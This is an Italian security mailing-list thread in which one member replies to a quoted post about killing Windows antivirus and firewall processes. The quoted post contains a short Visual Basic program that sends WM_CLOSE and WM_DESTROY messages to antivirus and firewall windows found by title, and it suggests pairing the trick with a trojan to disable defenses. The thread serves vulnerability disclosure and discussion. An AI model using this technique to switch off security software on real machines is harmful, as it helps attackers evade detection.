Re: Morte degli antivirus e dei Firewall

Ciao,
non vorrei sgonvolgerti le idee ma comunque questo è un problema 
conosciuto da molto tempo :) il problema di fondo è un'altro, ed è molto 
complesso e "pericoloso". Se gli antivirus non lasciasseto passare 
queste messaggi del sistema il caro e vecchio windows non si spegnerebbe 
più... Tutte le patch rilasciate per questo fatto a mio parere sono come 
tappare un buco in un muro pieno... nel senso che sono un modo per non 
fare funzionare questo metodo, ma ce ne sono molti altri... a questo 
punto viene da chiedersi, se si preferisce avere un sistema che non si 
chiude più, ma con dei processi che non possono venire killati oppure 
avere un sistema che si spegne ma con processi che vanno e vengono... il 
problema più di fondo di tutti gli antivirus e firewall nei sistemi 
microsoft (nei sistemi unix un utente normale non può lanciare questi 
segnali ai processi di root) è che non esiste una protezione del sistema 
stesso, della sua memoria e degli accessi diretti ai dischi e agli 
antivirus in se stessi... Se si ha accesso diretto alla memoria (windows 
9x,ME possibile senza problemi) si ha la possibilità di fare ciò che si 
vuole su qualsiasi processo....

cya

Raistlinmage


NeMeS||y wrote:

> Saluti a tutti,
> ho acquistato ultimamente un giornale, ed un articolo, parlava della
> possibilità di killare, sotto windows, gli antivirus con molta semplicità
> utilizzando un API in particolare e tutto questo con poche righe di codice.
> Le case produttrici di AV hanno ritenuto questo bug irrisorio... tranne AVP
> che ha provveduto a rilasciare una patch. Per curiosità ho scritto due righe
> di codice in VB utilizzando l'API in questione... il codice è il seguente :
> 
> --
> Const WM_CLOSE = &H10
> 
> Private Declare Function FindWindowA Lib "user32" _
>     (ByVal lpClassName As Any, ByVal lpWindowName As Any) As Integer
> 
> Private Declare Function SendMessageA Lib "user32" _
>     (ByVal hWnd As Integer, ByVal wMsg As Integer, _
>     ByVal wParam As Integer, lParam As Any) As Long
> 
> Private Function Killer(hWnd&)
>     Dim Res&
>     Res = SendMessageA(hWnd, WM_CLOSE, 0, 0)
>     Res = SendMessageA(hWnd, WM_DESTROY, 0, 0)
> End Function
> 
> Private Sub Form_Load()
>   Dim hWnd&
>     hWnd = FindWindowA(vbNullString, "Navapw32")
>     Killer (hWnd)
>     hWnd = FindWindowA(vbNullString, "Panda Antivirus 6.0 Platinum")
>     Killer (hWnd)
> End Sub
> 
> --
> 
> ... Non fate caso ai nomi delle funzioni mi sono lasciato trasportare =)
> ho aggiunto una piccolezza rispetto ad altro codice che ho letto, che è
> "FindWindowA" semplicemente va a ricercare i parametri dell'applicazione da
> "contattare" in base al nome della stessa...
> 
> Cosa accade... semplicemente si fa credere all'antivirus che windows sta per
> terminare la sessione e quindi gli si chiede ( SendMessageA ) gentilmente di
> andare a fare... insomma di tornare da dove è venuto =)
> 
> La cosa carina è che lo stesso accade con i firewall (ho testato solo
> ZoneAlarm).. lo si puo testare aggiungendo nel Form_Load :
> 
> hWnd = FindWindowA(vbNullString, "Zonealarm")
> Killer (hWnd)
> 
> L'ultima versione di panda è ancora "vulnerabile", mentre norton ( anche
> avendo ritenuto tutto ciò irrisorio ) nell'ultima versione dopo aver
> effettuato l'update ciò non accade...
> 
> altri AV sono risultati vulnerabili (non testati da me personalmente) come :
> 
> AVP
> F-Prot
> McAfee
> Pc Cillin 2002 NT Version
> 
> lascio a voi le considerazioni... anche se io credo che il problema abbia
> una certa rilevanza, dato che con qualche artificio magari si puo collegare
> il tutto ad un trojan di vecchio stampo, e quindi dargli la possibilità di
> disattivare l'AV e magari anche il firewall giusto per il tempo che serve
> all'attacker di fare cio che vuole...
> insomma potrebbe essere un modo per dar sfogo alla fantasia =)
> 
> Fatemi sapere cosa ne pensate..
> 
> bye
>  -NeM
> 





________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List